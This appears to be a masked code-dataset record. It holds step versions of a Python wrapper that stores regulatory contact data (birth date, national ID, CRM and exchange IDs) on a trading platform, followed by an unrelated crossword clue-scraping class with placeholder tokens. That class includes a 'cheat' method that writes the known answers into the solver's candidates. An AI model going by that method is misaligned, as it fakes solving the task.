is_unique:\n try:\n self.__contact.AdditionalInfo().UniqueName(\n unique_name)\n except:\n pass\n else:\n msg = (\n 'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name.'\n % (unique_name, self.__contact.Fullname(),\n self.__contact.Party().Name(), contact_name))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n self.__reg_unique_name = unique_name\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))\n else:\n if not self.__reg_unique_name:\n self.__reg_unique_name = None\n return self.__reg_unique_name\n\n def ClientType(self):\n \"\"\"returns the ClientType based on where the CrmId is found on the linked objects\"\"\"\n self.__client_type = FRegulatoryUtils.getClientType(self.__contact)\n return self.__client_type\n\n def JointAccount(self):\n \"\"\"Another trader that jointly owns the account with this trader\"\"\"\n joint_accounts = []\n if self.IsGeneralPartner():\n for contact in self.__contact.Party().Contacts():\n if contact.AdditionalInfo().RegGeneralPartner():\n joint_accounts.append(contact)\n else:\n FRegulatoryLogger.WARN(logger, \n '<%s> is not a General Partner. Hence JointAccount is None' %\n self.__contact.Fullname())\n joint_accounts = None\n return joint_accounts\n\n def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):\n \"\"\"General partner has responsibility for the actions of the business, can legally bind\n the business and is personally liable for all the business's debts and obligations.\"\"\"\n if is_general_partner != VALUE_NOT_SET:\n self.__is_general_partner = FRegulatoryUtils.get_bool(\n is_general_partner, 'IsGeneralPartner')\n FRegulatoryLogger.DEBUG(logger, \n 'The IsGeneralPartner is being set to <%s>.' % str(self.\n __is_general_partner))\n try:\n self.__contact.AdditionalInfo().RegGeneralPartner(self.\n __is_general_partner)\n except:\n pass\n else:\n if str(self.__is_general_partner) == 'None':\n FRegulatoryLogger.DEBUG(logger,\n 'The IsGeneralPartner is None. Hence defaulting it to False'\n )\n self.__is_general_partner = False\n return self.__is_general_partner\n\n def __setattr__(self, attr, val):\n if attr.startswith('_'):\n super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)\n elif hasattr(self, attr):\n getattr(self, attr)(val)\n\n def Commit(self):\n \"\"\"Committing this instance will automatically commit all the RegulatorySupport related attributes on the contact\"\"\"\n try:\n acm.BeginTransaction()\n self.__contact.Commit()\n if FIntegrationUtils.FIntegrationUtils.get_acm_version_override(\n ) < 2015.4:\n self.__integration_utils.set_additional_info('DateOfBirth',\n self.__contact, self.__reg_date_of_birth)\n self.__integration_utils.set_additional_info('FirstName',\n self.__contact, self.__reg_first_name)\n self.__integration_utils.set_additional_info('LastName',\n self.__contact, self.__reg_last_name)\n self.__integration_utils.set_additional_info('NationalId',\n self.__contact, self.__reg_national_id)\n self.__integration_utils.set_additional_info('RegContactCrmId',\n self.__contact, self.__reg_crm_id)\n self.__integration_utils.set_additional_info(\n 'RegContExchangeId', self.__contact, self.__reg_exchange_id\n )\n self.__integration_utils.set_additional_info('UniqueName',\n self.__contact, self.__reg_unique_name)\n self.__integration_utils.set_additional_info(\n 'RegGeneralPartner', self.__contact, self.\n __is_general_partner)\n acm.CommitTransaction()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n FRegulatoryLogger.ERROR(logger, 'ABORTING TRANSACTION***********')\n acm.AbortTransaction()\n\n def Delete(self):\n \"\"\"Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS\"\"\"\n FRegulatoryUtils.Delete(self.__contact, 'Contact')\n FRegulatoryLogger.DEBUG(logger,\n 'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'\n )\n\n def Attributes(self):\n \"\"\"returns the attributes on the FContactRegulatoryInfoBase instance\"\"\"\n return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass FContactRegulatoryInfoBase(object):\n\n def __init__(self, contact=None):\n \"\"\"class that maintains all data related to the regulatory on the FContact\"\"\"\n try:\n self.__contact = contact\n if not self.__contact:\n FRegulatoryLogger.ERROR(logger,\n 'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'\n )\n return None\n self.__reg_date_of_birth = None\n self.__reg_first_name = None\n self.__reg_last_name = None\n self.__reg_national_id = None\n self.__reg_crm_id = None\n self.__crm_id_source = None\n self.__reg_exchange_id = None\n self.__reg_unique_name = None\n self.__client_type = None\n self.__is_general_partner = None\n if contact:\n self.__refresh(contact)\n self.__integration_utils = FIntegrationUtils.FIntegrationUtils()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n\n def __refresh(self, contact):\n self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value(\n 'dateOfBirth', self.__contact)\n self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName',\n self.__contact)\n self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName',\n self.__contact)\n self.__reg_national_id = FRegulatoryUtils.get_addinfo_value(\n 'nationalId', self.__contact)\n self.__is_general_partner = FRegulatoryUtils.get_addinfo_value(\n 'regGeneralPartner', self.__contact)\n self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value(\n 'regContactCrmId', self.__contact)\n self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value(\n 'regContExchangeId', self.__contact)\n try:\n self.__reg_unique_name = self.__contact.UniqueName()\n except:\n self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value(\n 'uniqueName', self.__contact)\n\n def Contact(self):\n \"\"\"returns the contact for which this wrapper has all the addinfo/column values\"\"\"\n return self.__contact\n\n def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):\n \"\"\"Date of birth of the concerned natural person\"\"\"\n ael_reg_dob = None\n if reg_date_of_birth != VALUE_NOT_SET:\n try:\n ael_reg_dob = ael.date_from_string(reg_date_of_birth)\n except:\n if reg_date_of_birth not in ['', None]:\n msg = (\n 'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'\n % reg_date_of_birth)\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n if ael_reg_dob:\n self.__reg_date_of_birth = reg_date_of_birth\n else:\n self.__reg_date_of_birth = None\n try:\n self.__contact.AdditionalInfo().DateOfBirth(self.\n __reg_date_of_birth)\n except:\n pass\n else:\n return self.__reg_date_of_birth\n\n def FirstName(self, reg_first_name=VALUE_NOT_SET):\n \"\"\"First name of the concerned natural person\"\"\"\n if reg_first_name != VALUE_NOT_SET:\n self.__reg_first_name = reg_first_name\n try:\n self.__contact.AdditionalInfo().FirstName(self.__reg_first_name\n )\n except:\n pass\n else:\n if not self.__reg_first_name:\n self.__reg_first_name = None\n return self.__reg_first_name\n\n def LastName(self, reg_last_name=VALUE_NOT_SET):\n \"\"\"Last name of the concerned natural person\"\"\"\n if reg_last_name != VALUE_NOT_SET:\n self.__reg_last_name = reg_last_name\n try:\n self.__contact.AdditionalInfo().LastName(self.__reg_last_name)\n except:\n pass\n else:\n if not self.__reg_last_name:\n self.__reg_last_name = None\n return self.__reg_last_name\n\n def NationalId(self, reg_national_id=VALUE_NOT_SET):\n \"\"\"NationalId of the concerned natural person\"\"\"\n if reg_national_id != VALUE_NOT_SET:\n self.__reg_national_id = reg_national_id\n try:\n self.__contact.AdditionalInfo().NationalId(self.\n __reg_national_id)\n except:\n pass\n else:\n if not self.__reg_national_id:\n self.__reg_national_id = None\n return self.__reg_national_id\n\n def CrmId(self, crm_id=VALUE_NOT_SET):\n \"\"\"CrmId of the concerned natural person\"\"\"\n if crm_id != VALUE_NOT_SET:\n self.__reg_crm_id = crm_id\n try:\n self.__contact.AdditionalInfo().RegContactCrmId(self.\n __reg_crm_id)\n except:\n pass\n else:\n if not self.__reg_crm_id:\n self.__reg_crm_id = None\n return self.__reg_crm_id\n\n def ExchangeId(self, exchange_id=VALUE_NOT_SET):\n \"\"\"The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged.\"\"\"\n if exchange_id != VALUE_NOT_SET:\n if str(exchange_id).isdigit():\n self.__reg_exchange_id = int(exchange_id)\n elif str(exchange_id) in ['None', '']:\n self.__reg_exchange_id = None\n else:\n msg = (\n 'The ExchangeId provided <%s> is not of the expected integer format'\n % str(exchange_id))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n try:\n self.__contact.AdditionalInfo().RegContExchangeId(self.\n __reg_exchange_id)\n except:\n pass\n else:\n if not self.__reg_exchange_id:\n self.__reg_exchange_id = None\n return self.__reg_exchange_id\n\n def UniqueName(self, unique_name=VALUE_NOT_SET):\n \"\"\"An optional unique name, if specified there can only be one contact with this name for each party.\"\"\"\n if unique_name != VALUE_NOT_SET:\n try:\n if (FIntegrationUtils.FIntegrationUtils.\n get_acm_version_override() >= 2017.2):\n self.__contact.UniqueName(unique_name)\n else:\n is_unique, contact_name = FRegulatoryUtils.is_unique_name(\n self.__contact, unique_name)\n if is_unique:\n try:\n self.__contact.AdditionalInfo().UniqueName(\n unique_name)\n except:\n pass\n else:\n msg = (\n 'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name.'\n % (unique_name, self.__contact.Fullname(),\n self.__contact.Party().Name(), contact_name))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n self.__reg_unique_name = unique_name\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))\n else:\n if not self.__reg_unique_name:\n self.__reg_unique_name = None\n return self.__reg_unique_name\n\n def ClientType(self):\n \"\"\"returns the ClientType based on where the CrmId is found on the linked objects\"\"\"\n self.__client_type = FRegulatoryUtils.getClientType(self.__contact)\n return self.__client_type\n\n def JointAccount(self):\n \"\"\"Another trader that jointly owns the account with this trader\"\"\"\n joint_accounts = []\n if self.IsGeneralPartner():\n for contact in self.__contact.Party().Contacts():\n if contact.AdditionalInfo().RegGeneralPartner():\n joint_accounts.append(contact)\n else:\n FRegulatoryLogger.WARN(logger, \n '<%s> is not a General Partner. Hence JointAccount is None' %\n self.__contact.Fullname())\n joint_accounts = None\n return joint_accounts\n\n def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):\n \"\"\"General partner has responsibility for the actions of the business, can legally bind\n the business and is personally liable for all the business's debts and obligations.\"\"\"\n if is_general_partner != VALUE_NOT_SET:\n self.__is_general_partner = FRegulatoryUtils.get_bool(\n is_general_partner, 'IsGeneralPartner')\n FRegulatoryLogger.DEBUG(logger, \n 'The IsGeneralPartner is being set to <%s>.' % str(self.\n __is_general_partner))\n try:\n self.__contact.AdditionalInfo().RegGeneralPartner(self.\n __is_general_partner)\n except:\n pass\n else:\n if str(self.__is_general_partner) == 'None':\n FRegulatoryLogger.DEBUG(logger,\n 'The IsGeneralPartner is None. Hence defaulting it to False'\n )\n self.__is_general_partner = False\n return self.__is_general_partner\n\n def __setattr__(self, attr, val):\n if attr.startswith('_'):\n super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)\n elif hasattr(self, attr):\n getattr(self, attr)(val)\n\n def Commit(self):\n \"\"\"Committing this instance will automatically commit all the RegulatorySupport related attributes on the contact\"\"\"\n try:\n acm.BeginTransaction()\n self.__contact.Commit()\n if FIntegrationUtils.FIntegrationUtils.get_acm_version_override(\n ) < 2015.4:\n self.__integration_utils.set_additional_info('DateOfBirth',\n self.__contact, self.__reg_date_of_birth)\n self.__integration_utils.set_additional_info('FirstName',\n self.__contact, self.__reg_first_name)\n self.__integration_utils.set_additional_info('LastName',\n self.__contact, self.__reg_last_name)\n self.__integration_utils.set_additional_info('NationalId',\n self.__contact, self.__reg_national_id)\n self.__integration_utils.set_additional_info('RegContactCrmId',\n self.__contact, self.__reg_crm_id)\n self.__integration_utils.set_additional_info(\n 'RegContExchangeId', self.__contact, self.__reg_exchange_id\n )\n self.__integration_utils.set_additional_info('UniqueName',\n self.__contact, self.__reg_unique_name)\n self.__integration_utils.set_additional_info(\n 'RegGeneralPartner', self.__contact, self.\n __is_general_partner)\n acm.CommitTransaction()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n FRegulatoryLogger.ERROR(logger, 'ABORTING TRANSACTION***********')\n acm.AbortTransaction()\n\n def Delete(self):\n \"\"\"Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS\"\"\"\n FRegulatoryUtils.Delete(self.__contact, 'Contact')\n FRegulatoryLogger.DEBUG(logger,\n 'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'\n )\n\n def Attributes(self):\n \"\"\"returns the attributes on the FContactRegulatoryInfoBase instance\"\"\"\n return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)\n\n\ndef RegulatoryInfo(self):\n \"\"\"returns the FContactRegulatoryInfoBase instance for the given contact\"\"\"\n conactRegInfo = FContactRegulatoryInfo(self)\n return conactRegInfo\n\n\ndef Select(query):\n \"\"\"Return a collection of FContactRegulatoryInfoBase instances matching constraint specified in the Select query\"\"\"\n party = None\n if query.find('and party') != -1:\n pos = query.find('and party')\n party_name = query[pos + len('and party'):]\n query = query[0:pos]\n party_name = party_name.replace('=', '').replace(\"'\", '')\n party_name = party_name.strip()\n party = acm.FParty[party_name]\n return_result = FRegulatoryUtils.Select(query, 'FContact', party)\n return return_result\n",
"step-5": "\"\"\"------------------------------------------------------------------------\nMODULE\n FContactRegulatoryInfoBase -\nDESCRIPTION:\n This file provides the custom instance of RegulatoryInfo on the Contact which has all the RegulatoryInfo related methods\nVERSION: 1.0.25(0.25.7)\nRESTRICTIONS/ LIMITATIONS:\n 1. Any modifications to the scripts/ encrypted modules/ clear text code within the core is not supported.\n 2. This module is not customizable\n 3. The component may not work as expected with any modifications done to this module at user end\n--------------------------------------------------------------------------\"\"\"\nimport string\nimport acm\nimport FIntegrationUtils\nimport FRegulatoryLogger\nimport ael\nimport FRegulatoryUtils\nimport FRegulatoryInfoException\nlogger = 'FContactRegulatoryInfoBase'\nVALUE_NOT_SET = ()\n\nclass FContactRegulatoryInfoBase(object):\n def __init__(self, contact = None):\n \"\"\"class that maintains all data related to the regulatory on the FContact\"\"\"\n try:\n self.__contact = contact\n if not self.__contact:\n FRegulatoryLogger.ERROR(logger, \"The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object\")\n return None\n self.__reg_date_of_birth = None\n self.__reg_first_name = None\n self.__reg_last_name = None\n self.__reg_national_id = None\n self.__reg_crm_id = None\n self.__crm_id_source = None\n self.__reg_exchange_id = None\n self.__reg_unique_name = None\n self.__client_type = None\n self.__is_general_partner = None\n if contact:\n self.__refresh(contact)\n self.__integration_utils = FIntegrationUtils.FIntegrationUtils()\n except Exception as e :\n FRegulatoryLogger.ERROR(logger, str(e))\n\n def __refresh(self, contact):\n self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value('dateOfBirth', self.__contact)\n self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName', self.__contact)\n self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName', self.__contact)\n self.__reg_national_id = FRegulatoryUtils.get_addinfo_value('nationalId', self.__contact)\n self.__is_general_partner = FRegulatoryUtils.get_addinfo_value('regGeneralPartner', self.__contact)\n self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value('regContactCrmId', self.__contact)\n self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value('regContExchangeId', self.__contact)\n try:\n self.__reg_unique_name = self.__contact.UniqueName()\n except:\n self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value('uniqueName', self.__contact)\n\n def Contact(self):\n \"\"\"returns the contact for which this wrapper has all the addinfo/column values\"\"\"\n return self.__contact\n\n def DateOfBirth(self, reg_date_of_birth = VALUE_NOT_SET):\n \"\"\"Date of birth of the concerned natural person\"\"\"\n ael_reg_dob = None\n if reg_date_of_birth != VALUE_NOT_SET:\n try:\n ael_reg_dob = ael.date_from_string(reg_date_of_birth)\n except:\n if reg_date_of_birth not in ['', None]:\n msg = \"The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo\"%reg_date_of_birth\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n if ael_reg_dob:\n self.__reg_date_of_birth = reg_date_of_birth\n else:\n self.__reg_date_of_birth = None\n try:\n self.__contact.AdditionalInfo().DateOfBirth(self.__reg_date_of_birth)\n except:\n pass\n else:\n return self.__reg_date_of_birth\n\n def FirstName(self, reg_first_name = VALUE_NOT_SET):\n \"\"\"First name of the concerned natural person\"\"\"\n if reg_first_name != VALUE_NOT_SET:\n self.__reg_first_name = reg_first_name\n try:\n self.__contact.AdditionalInfo().FirstName(self.__reg_first_name)\n except:\n pass\n else:\n if not self.__reg_first_name:\n self.__reg_first_name = None\n return self.__reg_first_name\n\n def LastName(self, reg_last_name = VALUE_NOT_SET):\n \"\"\"Last name of the concerned natural person\"\"\"\n if reg_last_name != VALUE_NOT_SET:\n self.__reg_last_name = reg_last_name\n try:\n self.__contact.AdditionalInfo().LastName(self.__reg_last_name)\n except:\n pass\n else:\n if not self.__reg_last_name:\n self.__reg_last_name = None\n return self.__reg_last_name\n\n def NationalId(self, reg_national_id = VALUE_NOT_SET):\n \"\"\"NationalId of the concerned natural person\"\"\"\n if reg_national_id != VALUE_NOT_SET:\n self.__reg_national_id = reg_national_id\n try:\n self.__contact.AdditionalInfo().NationalId(self.__reg_national_id)\n except:\n pass\n else:\n if not self.__reg_national_id:\n self.__reg_national_id = None\n return self.__reg_national_id\n\n def CrmId(self, crm_id = VALUE_NOT_SET):\n \"\"\"CrmId of the concerned natural person\"\"\"\n if crm_id != VALUE_NOT_SET:\n self.__reg_crm_id = crm_id\n try:\n self.__contact.AdditionalInfo().RegContactCrmId(self.__reg_crm_id)\n except:\n pass\n else:\n if not self.__reg_crm_id:\n self.__reg_crm_id = None\n return self.__reg_crm_id\n\n def ExchangeId(self, exchange_id = VALUE_NOT_SET):\n \"\"\"The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged.\"\"\"\n if exchange_id != VALUE_NOT_SET:\n if str(exchange_id).isdigit():\n self.__reg_exchange_id = int(exchange_id)\n elif str(exchange_id) in ['None', '']:\n self.__reg_exchange_id = None\n else:\n msg = \"The ExchangeId provided <%s> is not of the expected integer format\"%str(exchange_id)\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n try:\n self.__contact.AdditionalInfo().RegContExchangeId(self.__reg_exchange_id)\n except:\n pass\n else:\n if not self.__reg_exchange_id:\n self.__reg_exchange_id = None\n return self.__reg_exchange_id\n\n def UniqueName(self, unique_name = VALUE_NOT_SET):\n \"\"\"An optional unique name, if specified there can only be one contact with this name for each party.\"\"\"\n if unique_name != VALUE_NOT_SET:\n try:\n if FIntegrationUtils.FIntegrationUtils.get_acm_version_override() >= 2017.2:\n self.__contact.UniqueName(unique_name)\n else:\n is_unique, contact_name = FRegulatoryUtils.is_unique_name(self.__contact, unique_name)\n if is_unique:\n try:\n self.__contact.AdditionalInfo().UniqueName(unique_name)\n except:\n pass\n else:\n msg = \"The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name.\"%(unique_name, self.__contact.Fullname(), self.__contact.Party().Name(), contact_name)\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n self.__reg_unique_name = unique_name\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))\n else:\n if not self.__reg_unique_name:\n self.__reg_unique_name = None\n return self.__reg_unique_name\n\n def ClientType(self):\n \"\"\"returns the ClientType based on where the CrmId is found on the linked objects\"\"\"\n self.__client_type = FRegulatoryUtils.getClientType(self.__contact)\n return self.__client_type\n\n def JointAccount(self):\n \"\"\"Another trader that jointly owns the account with this trader\"\"\"\n joint_accounts = []\n if self.IsGeneralPartner():\n for contact in self.__contact.Party().Contacts(): \n if contact.AdditionalInfo().RegGeneralPartner(): \n joint_accounts.append(contact)\n else:\n FRegulatoryLogger.WARN(logger, \"<%s> is not a General Partner. Hence JointAccount is None\"%self.__contact.Fullname())\n joint_accounts = None\n return joint_accounts \n\n def IsGeneralPartner(self, is_general_partner = VALUE_NOT_SET):\n \"\"\"General partner has responsibility for the actions of the business, can legally bind\n the business and is personally liable for all the business's debts and obligations.\"\"\"\n if is_general_partner != VALUE_NOT_SET:\n self.__is_general_partner = FRegulatoryUtils.get_bool(is_general_partner, 'IsGeneralPartner')\n FRegulatoryLogger.DEBUG(logger, \"The IsGeneralPartner is being set to <%s>.\"%(str(self.__is_general_partner)))\n try:\n self.__contact.AdditionalInfo().RegGeneralPartner(self.__is_general_partner)\n except:\n pass\n\n else:\n if str(self.__is_general_partner) == \"None\":\n FRegulatoryLogger.DEBUG(logger, \"The IsGeneralPartner is None. Hence defaulting it to False\")\n self.__is_general_partner = False\n return self.__is_general_partner\n\n def __setattr__(self, attr, val):\n if attr.startswith('_'):\n super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)\n else:\n if hasattr(self, attr):\n getattr(self, attr)(val)\n\n def Commit(self):\n \"\"\"Committing this instance will automatically commit all the RegulatorySupport related attributes on the contact\"\"\"\n try:\n acm.BeginTransaction()\n self.__contact.Commit()\n if FIntegrationUtils.FIntegrationUtils.get_acm_version_override() < 2015.4:\n self.__integration_utils.set_additional_info('DateOfBirth', self.__contact, self.__reg_date_of_birth)\n self.__integration_utils.set_additional_info('FirstName', self.__contact, self.__reg_first_name)\n self.__integration_utils.set_additional_info('LastName', self.__contact, self.__reg_last_name)\n self.__integration_utils.set_additional_info('NationalId', self.__contact, self.__reg_national_id)\n self.__integration_utils.set_additional_info('RegContactCrmId', self.__contact, self.__reg_crm_id)\n self.__integration_utils.set_additional_info('RegContExchangeId', self.__contact, self.__reg_exchange_id)\n self.__integration_utils.set_additional_info('UniqueName', self.__contact, self.__reg_unique_name)\n self.__integration_utils.set_additional_info('RegGeneralPartner', self.__contact, self.__is_general_partner)\n acm.CommitTransaction()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n FRegulatoryLogger.ERROR(logger, \"ABORTING TRANSACTION***********\")\n acm.AbortTransaction()\n\n def Delete(self):\n \"\"\"Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS\"\"\"\n FRegulatoryUtils.Delete(self.__contact, \"Contact\")\n FRegulatoryLogger.DEBUG(logger, \"Deleted all AdditionalInfos on Contact related to Regulatory Reporting\")\n\n def Attributes(self):\n \"\"\"returns the attributes on the FContactRegulatoryInfoBase instance\"\"\"\n return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)\n\ndef RegulatoryInfo(self):\n \"\"\"returns the FContactRegulatoryInfoBase instance for the given contact\"\"\"\n conactRegInfo = FContactRegulatoryInfo(self)\n return conactRegInfo\n\ndef Select(query):\n \"\"\"Return a collection of FContactRegulatoryInfoBase instances matching constraint specified in the Select query\"\"\"\n party = None\n if query.find('and party') != -1:#it means there is an additional condition added\n pos = query.find('and party')\n party_name = query[(pos + len('and party')):]\n query = query[0:pos]\n party_name = party_name.replace('=', '').replace(\"'\", '')\n party_name = party_name.strip()\n party = acm.FParty[party_name]\n return_result = FRegulatoryUtils.Select(query, \"FContact\", party)\n return return_result\n\n",
"step-ids": [
13,
15,
18,
20,
23
]
}
|
[
13,
15,
18,
20,
23
] |
<|reserved_special_token_0|>
class Scraping:
def __init__(self, clues, answers, gridIndex):
self.clues = clues
self.domains = {'across': {}, 'down': {}}
self.answers = answers
self.gridIndex = gridIndex
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def getSynonyms(self, toSearch):
return searchSynonyms(toSearch, self.clues['across'], self.clues[
'down'])
def cheat(self):
for across in self.clues['across']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == across:
answer = ''
for colIn in range(0, 5):
if self.answers[row][colIn] != '-':
answer = answer + self.answers[row][colIn]
self.domains['across'][across] = self.domains['across'
][across] + ' ' + answer
for down in self.clues['down']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == down:
answer = ''
for rowIn in range(0, 5):
if self.answers[rowIn][col] != '-':
answer = answer + self.answers[rowIn][col]
self.domains['down'][down] = self.domains['down'][down
] + ' ' + answer
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Scraping:
def __init__(self, clues, answers, gridIndex):
self.clues = clues
self.domains = {'across': {}, 'down': {}}
self.answers = answers
self.gridIndex = gridIndex
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def search(self, clue):
domain = set()
wiki_set = set()
synonym_set = set()
toSearch = clue
"""
print("Google search for:", toSearch)
try:
domain = domain + self.getGoogle(toSearch)
except:
print("An exception occurred")
"""
print('Wikipedia search for:', toSearch)
try:
wiki_set = wiki_set | self.getWiki(toSearch)
except:
print('An exception occurred')
print('Synonym search from Datamuse and Merriam-Webster for:', toSearch
)
try:
synonym_set = synonym_set | self.getSynonyms(toSearch)
except:
print('An exception occurred')
"""
print("Merriam Webster search for:", toSearch)
try:
merriam_set = merriam_set | self.getMerriam(toSearch)
except:
print("An exception occurred")
"""
domain = domain.union(wiki_set, synonym_set)
return ' '.join(str(e) for e in domain)
<|reserved_special_token_0|>
def getWiki(self, toSearch):
return searchWikipedia(toSearch)
<|reserved_special_token_0|>
def getSynonyms(self, toSearch):
return searchSynonyms(toSearch, self.clues['across'], self.clues[
'down'])
def cheat(self):
for across in self.clues['across']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == across:
answer = ''
for colIn in range(0, 5):
if self.answers[row][colIn] != '-':
answer = answer + self.answers[row][colIn]
self.domains['across'][across] = self.domains['across'
][across] + ' ' + answer
for down in self.clues['down']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == down:
answer = ''
for rowIn in range(0, 5):
if self.answers[rowIn][col] != '-':
answer = answer + self.answers[rowIn][col]
self.domains['down'][down] = self.domains['down'][down
] + ' ' + answer
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Scraping:
def __init__(self, clues, answers, gridIndex):
self.clues = clues
self.domains = {'across': {}, 'down': {}}
self.answers = answers
self.gridIndex = gridIndex
def setDomains(self):
for down in self.clues['down']:
self.domains['down'][down] = self.search(self.clues['down'][down])
for across in self.clues['across']:
self.domains['across'][across] = self.search(self.clues[
'across'][across])
<|reserved_special_token_0|>
def search(self, clue):
domain = set()
wiki_set = set()
synonym_set = set()
toSearch = clue
"""
print("Google search for:", toSearch)
try:
domain = domain + self.getGoogle(toSearch)
except:
print("An exception occurred")
"""
print('Wikipedia search for:', toSearch)
try:
wiki_set = wiki_set | self.getWiki(toSearch)
except:
print('An exception occurred')
print('Synonym search from Datamuse and Merriam-Webster for:', toSearch
)
try:
synonym_set = synonym_set | self.getSynonyms(toSearch)
except:
print('An exception occurred')
"""
print("Merriam Webster search for:", toSearch)
try:
merriam_set = merriam_set | self.getMerriam(toSearch)
except:
print("An exception occurred")
"""
domain = domain.union(wiki_set, synonym_set)
return ' '.join(str(e) for e in domain)
def getGoogle(self, toSearch):
return 'toSearch'
def getWiki(self, toSearch):
return searchWikipedia(toSearch)
def getMerriam(self, toSearch):
return searchMerriamWebster(toSearch)
def getSynonyms(self, toSearch):
return searchSynonyms(toSearch, self.clues['across'], self.clues[
'down'])
def cheat(self):
for across in self.clues['across']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == across:
answer = ''
for colIn in range(0, 5):
if self.answers[row][colIn] != '-':
answer = answer + self.answers[row][colIn]
self.domains['across'][across] = self.domains['across'
][across] + ' ' + answer
for down in self.clues['down']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == down:
answer = ''
for rowIn in range(0, 5):
if self.answers[rowIn][col] != '-':
answer = answer + self.answers[rowIn][col]
self.domains['down'][down] = self.domains['down'][down
] + ' ' + answer
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from getMerriamWebster import searchMerriamWebster
from searchWikipedia import searchWikipedia
from synonyms import searchSynonyms
class Scraping:
def __init__(self, clues, answers, gridIndex):
self.clues = clues
self.domains = {'across': {}, 'down': {}}
self.answers = answers
self.gridIndex = gridIndex
def setDomains(self):
for down in self.clues['down']:
self.domains['down'][down] = self.search(self.clues['down'][down])
for across in self.clues['across']:
self.domains['across'][across] = self.search(self.clues[
'across'][across])
def getClueList(self, clue):
clueList = [clue]
return clueList
def search(self, clue):
domain = set()
wiki_set = set()
synonym_set = set()
toSearch = clue
"""
print("Google search for:", toSearch)
try:
domain = domain + self.getGoogle(toSearch)
except:
print("An exception occurred")
"""
print('Wikipedia search for:', toSearch)
try:
wiki_set = wiki_set | self.getWiki(toSearch)
except:
print('An exception occurred')
print('Synonym search from Datamuse and Merriam-Webster for:', toSearch
)
try:
synonym_set = synonym_set | self.getSynonyms(toSearch)
except:
print('An exception occurred')
"""
print("Merriam Webster search for:", toSearch)
try:
merriam_set = merriam_set | self.getMerriam(toSearch)
except:
print("An exception occurred")
"""
domain = domain.union(wiki_set, synonym_set)
return ' '.join(str(e) for e in domain)
def getGoogle(self, toSearch):
return 'toSearch'
def getWiki(self, toSearch):
return searchWikipedia(toSearch)
def getMerriam(self, toSearch):
